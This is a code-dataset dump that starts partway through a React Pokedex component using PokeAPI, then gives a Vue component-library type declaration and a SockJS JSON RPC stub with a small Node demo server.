const [id, setId] = useState(null);
const [types, setTypes] = useState([]);
const [stats, setStats] = useState([]);
const [image, setImage] = useState(null);
const [order, setOrder] = useState(null);
const [height, setHeight] = useState(null);
const [weight, setWeight] = useState(null);
const [abilities, setAbilities] = useState([]);
const [moves, setMoves] = useState([]);
const [encounters, setEncounters] = useState([]);
const [enconutersList, setEncountersList] = useState([]);
const limit = 6;
const [start, setStart] = useState(0);
const [final, setFinal] = useState(limit);
const [movesRenderList, setMovesRenderList] = useState([]);
const [top, setTop] = useState(0);
const localEncounter = (data) => {
let encounter = data.split("-");
let local = { region: null, area: null, extra: null };
if (encounter.includes("route")) {
encounter.splice(encounter.indexOf("area"), 1);
local.area = encounter.splice(encounter.indexOf("route"), 2).join(" ");
local.region = encounter.splice(0, 1).toString();
if (encounter.length > 0) {
local.extra = encounter.join(" ");
}
} else {
encounter.splice(encounter.indexOf("area"), 1);
local.area = encounter.join(" ");
}
if (local.region && local.area) {
return (
<div className="locate">
<span>
<b>Region: </b>
{local.region}
</span>
<span>
<b>Area: </b>
{local.area}
</span>
</div>
);
} else if (local.area) {
return (
<div className="locate">
<span>
<b>Area: </b>
{local.area}
</span>
</div>
);
}
};
useEffect(() => {
if (state.name) {
axios
.get(`https://pokeapi.co/api/v2/pokemon/${state.name}`)
.then((response) => setPokemon(response.data));
}
}, [state.name]);
useEffect(() => {
if (pokemon) {
setName(pokemon.name);
setId(pokemon.id);
setTypes(
pokemon.types.map((t) => <Type key={t.slot} type={t.type.name} />)
);
setStats(
pokemon.stats.map((s, index) => (
<Stat key={index} baseStat={s.base_stat} name={s.stat.name} />
))
);
setOrder(pokemon.order);
setHeight(pokemon.height);
setWeight(pokemon.weight);
setAbilities(
pokemon.abilities.map((a) => (
<span key={a.slot}>{a.ability.name.replace("-", " ")}</span>
))
);
setMoves(
pokemon.moves.map((m, index) => (
<span key={index}>{m.move.name.replace("-", " ")}</span>
))
);
axios
.get(pokemon.location_area_encounters)
.then((response) => setEncounters(response.data));
}
}, [pokemon]);
useEffect(() => {
if (id) {
setImage(
`https://raw.githubusercontent.com/PokeAPI/sprites/master/sprites/pokemon/other/official-artwork/${id}.png`
);
}
}, [id]);
useEffect(() => {
if (moves) {
let list = [];
for (let i = start; i < final; i++) {
list.push(moves[i]);
}
setMovesRenderList(list);
setTop(Math.ceil(moves.length / limit));
}
}, [start, final, moves, limit]);
useEffect(() => {
if (encounters) {
if (encounters.length === 0) {
setEncountersList("Location not available ");
} else {
let list = [];
for (let i = 0; i < encounters.length; i++) {
const encounter = encounters[i].location_area.name;
list.push(localEncounter(encounter));
}
if (list.length < 10) {
setEncountersList(list);
} else {
let helper = [];
for (let i = 0; i < 10; i++) {
helper.push(list[i]);
}
setEncountersList(helper);
}
}
}
}, [encounters]);
return (
<div className="Pokemon">
<div className="PokemonHeaders">
<div className="PokemonName">
<h1>{name}</h1>
</div>
<div className="PokemonImage">
<img alt={name} src={image} />
</div>
<div className="PokemonTypes">{types}</div>
</div>
<Switch>
<ProtectedRoute path={`${path}/encounters`}>
<div className="PokemonEncounter">
<div className="PokemonLocations">
<div className="LocationTitle">
<h1>Where Locate it?</h1>
</div>
<div className="LocationEncounters">{enconutersList}</div>
</div>
<div className="PokemonEncountersButtons">
<button
onClick={() => {
history.goBack();
}}
>
Back
</button>
</div>
</div>
</ProtectedRoute>
<ProtectedRoute path={path}>
<div className="PokemonInfo">
<div className="PokedexNumber">
<p>Pokedex: {order}</p>
</div>
<div className="PokemonQualities">
<div className="height">
<span>Height: </span>
<span>{height / 10} m</span>
</div>
<div className="weight">
<span>Weight: </span>
<span>{weight / 10} Kg</span>
</div>
</div>
<div className="PokemonStats">{stats}</div>
<div className="PokemonAbilities">
<div className="PokemonAbilitiesContent">{abilities}</div>
</div>
<div className="PokemonMoves">
<div className="PokemonMovesPrevious">
<FontAwesomeIcon
onClick={() => {
if (start > 0) {
setStart(start - limit);
setFinal(final - limit);
}
}}
icon={faChevronLeft}
size="3x"
className="cursor"
disabled={true}
/>
</div>
<div className="PokemonMovesItems">{movesRenderList}</div>
<div className="PokemonMovesNext">
<FontAwesomeIcon
onClick={() => {
if (final < top * limit) {
setStart(start + limit);
setFinal(final + limit);
}
}}
icon={faChevronRight}
size="3x"
className="cursor"
/>
</div>
</div>
<div className="PokemonButtons">
<button
onClick={() => {
history.push("/pokedex");
}}
>
Back
</button>
<button
onClick={() => {
history.push(`${url}/encounters`, { name: state.name });
}}
>
Enconuters
</button>
</div>
</div>
</ProtectedRoute>
</Switch>
</div>
);
}
export default Pokemon;
<file_sep>/src/components/TrainerCard.js
import React, { useEffect, useState } from "react";
import { useHistory } from "react-router-dom";
import { useAuth } from "../Context/AuthProvider";
import "../css/TrainerCard.css";
import female from "../img/female.png";
import male from "../img/male.png";
import PorfileItem from "./PorfileItem";
function TrainerCard({ gender, user, id }) {
const [img, setImg] = useState(null);
const history = useHistory();
const auth = useAuth();
useEffect(() => {
if (gender === "female") {
setImg(female);
} else if (gender === "male") {
setImg(male);
}
}, [gender]);
return (
<div className="TrainerCard">
<div className="TrainerContainer">
<h1 className="Title">TRAINER CARD</h1>
<div className="Avatar">
<img alt="Avatar" src={img} />
</div>
<div className="Profile">
<PorfileItem name="ID" value={id} />
<PorfileItem name="USER" value={user} />
<PorfileItem name="FAV" value={0} />
</div>
<div className="Button">
<button
onClick={() => {
auth.signOut();
history.push("/");
}}
>
EXIT
</button>
</div>
</div>
</div>
);
}
export default TrainerCard;
|
f1cee988e7c5abaed54b915a2b62653ae88164d5
|
[
"JavaScript",
"Markdown"
] | 14
|
JavaScript
|
jceballos29/poke-app
|
b2689a6500b324d0ea73b36a3435c5574020db37
|
d6fcb9a7d3477fdf4057bdf3ff41ba62eb388f69
|
refs/heads/main
|
<repo_name>nirajhinge/component-library<file_sep>/component-library.d.ts
import { DefineComponent, Plugin } from 'vue';
declare const ComponentLibrary: Exclude<Plugin['install'], undefined>;
export default ComponentLibrary;
export const ComponentLibrarySample: DefineComponent<{}, {}, any>;
<file_sep>/src/lib-components/index.ts
/* eslint-disable import/prefer-default-export */
export { default as ComponentLibrarySample } from './component-library-sample.vue';
|
e68d58d3ce77f1a0571f0efa43e401835cab2c19
|
[
"TypeScript"
] | 2
|
TypeScript
|
nirajhinge/component-library
|
171f4697f9887980c2e89d925783f326da0c6b17
|
d3ee6c9a49216b1f91b707aa322feb2d4f852ba8
|
refs/heads/master
|
<file_sep>require('es6-promise');
var http = require('http');
var sockjs = require('sockjs');
var node_static = require('node-static');
var Stub = require('SockJSStub');
function handleConnection(conn){
// Stub the connection
var stub = Stub.SockJSServerStub(conn);
stub.on('add', function(a,b){
return a+b;
});
stub.on('addAsync', function(a,b) {
setTimeout(function(){
this.return(a+b);
}.bind(this), 1000);
});
stub.on('foo', function(n) {
stub.call('bar', [n,n*2]).then(this.return);
});
}
var sockjs_opts = {sockjs_url: "http://cdn.sockjs.org/sockjs-0.3.min.js"};
var sockjs_echo = sockjs.createServer(sockjs_opts);
sockjs_echo.on('connection', handleConnection);
var static_directory = new node_static.Server(__dirname);
var server = http.createServer();
server.addListener('request', function(req, res) {
static_directory.serve(req, res);
});
server.addListener('upgrade', function(req,res){
res.end();
});
sockjs_echo.installHandlers(server, {prefix:'/sjs'});
console.log(' [*] Listening on 0.0.0.0:2000' );
server.listen(2000, '0.0.0.0');
<file_sep>// Node versions might not have Promises
if (typeof require !== 'undefined') {
if (typeof Promise === 'undefined') {
Promise = require('es6-promise').Promise;
}
}
(function(exports) {
function SockJSStub(sockjs) {
var stub = new Stub();
stub.send = sockjs.send.bind(sockjs);
var oldOnMessage = sockjs.onmessage;
sockjs.onmessage = function(e) {
if(!stub.onMessage(e.data) && oldOnMessage) {
oldOnMessage(e);
}
};
return stub;
}
function SockJSServerStub(connection) {
var stub = new Stub();
stub.send = connection.write.bind(connection);
connection.on('data', stub.onMessage.bind(stub));
return stub;
}
function Stub(socket) {
/*
socket should have at least:
socket.send(string) - called by Stub to send data out
socket.onmessage(string) - set by Stub to be called upon data
These should be valid for 'new Stub(socket)' to work properly:
socket.send('asdf')
sock.onmessage = function(msg) {
console.log(msg);
}
*/
// Internal api:
this.rpcId = 0; // Counter used for cordinating messages
this.pendingRpcs = {}; // rpcId -> Promise.accept callback
this.handlers = {}; // string(eventName) -> [callbacks]
// External api:
this.on = this.on.bind(this);
this.call = this.call.bind(this);
}
Stub.prototype = {
//send: [socket.send],
call: function (eventName, args) {
/*
Send a new RPC message. Returns a promise that's called
when the other end returns.
Example:
rpc.call('add',[ 1, 2 ])
.then(function(value) {
console.log(value);
});
*/
return new Promise(function (ret) {
var id = this.rpcId ++;
this.pendingRpcs[id] = ret;
blob = JSON.stringify({ rpcId: id,
direction: 'request',
eventName: eventName,
args: args });
this.send(blob);
}.bind(this));
},
callHandler: function(handler, args, id) {
/*
Called by onMessage, this method calls the actual callback, with
the args received from the rpc request.
This is also responible for handling the callback's reply.
If a callback returns a non undefined result, or if the callback
uses 'this.return(value)' a reply is generated and sent to the
requester of the rpc.
For synchronous methods, just return the value:
rpc.on('foo', function (a+b) {
return a+b;
});
For asynchronous methods, use the 'this.return' callback:
rpc.on('query', function(str) {
redis.query(str).then(function(reply) {
// async return
this.return(reply);
});
});
TODO handle methods that don't have return values at all.
This might be doable with a method that gives you the async return callback
but also sets a flag specifying that they are async.
If the method returns undefined, and that flag is still unset, we know they
didn't return anything, and they didn't ask for the callback, so it's void.
TODO handle exceptions and forward them to the .catch half of the promise
*/
var send = this.send;
setTimeout(function () {
new Promise(function(accept) {
var ret;
try {
// allow 'this.return' to be called for async functions
ret = handler.apply({'return': accept}, args);
} finally {
if(ret !== undefined) {
accept(ret);
}
}
}).then(function (value) {
send(JSON.stringify({ rpcId: id,
direction: 'reply', value: value}));
});
}, 0);
},
onMessage: function (message) {
/*
Called by the underlying socket when a message is receive.
This is responsible for handing new requests, and replies from
old requests.
In the case of new requests, it will start the approriate callbacks.
In the case of a reply, it will finish the approriate promise(s).
*/
var obj, id, direction;
try {
obj = JSON.parse(message);
id = obj.rpcId;
direction = obj.direction;
} catch (error) {
console.warn("Couldn't parse message:", message, error);
return false;
}
// rpc request {rpcId:0, direction:'request', eventName: 'asdf', args:[] }
// rpc reply {rpcId:0, direction:'reply', value:'something' }
if (obj.direction === 'request') { // Handle rpc request
var handlers = this.handlers[obj.eventName] || [];
var hid;
if (handlers.length === 0) {
console.warn("Received rpc request for unbounded event:", obj);
}
for (hid = handlers.length-1; hid >= 0; --hid) {
this.callHandler(handlers[hid], obj.args, id);
}
}
if (obj.direction === 'reply') { // Handle rpc replies
(this.pendingRpcs[id] || function () {
console.warn("Got reply for non-existant rpc:", obj);
})(obj.value);
}
return true;
},
on: function (eventName, callback) {
/*
Register a new handler.
These functions will we called when the other end of the
connection calls the corresponding rpc.call method.
*/
this.handlers[eventName] = (this.handlers[eventName] || []).concat([callback]);
}
};
exports.Stub = Stub;
exports.SockJSStub = SockJSStub;
exports.SockJSServerStub = SockJSServerStub;
}(typeof exports === 'undefined'? this.SockJSStub={}: exports));
|
23978be3464d12d851da7672b55ca014469d4141
|
[
"JavaScript"
] | 2
|
JavaScript
|
theepicsnail/SockJSStub
|
d6c7968022fc14e63bd012f62a8a4a9d4b51ad0b
|
0093d75ca22085d8aec2e260b185b926960a84e0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.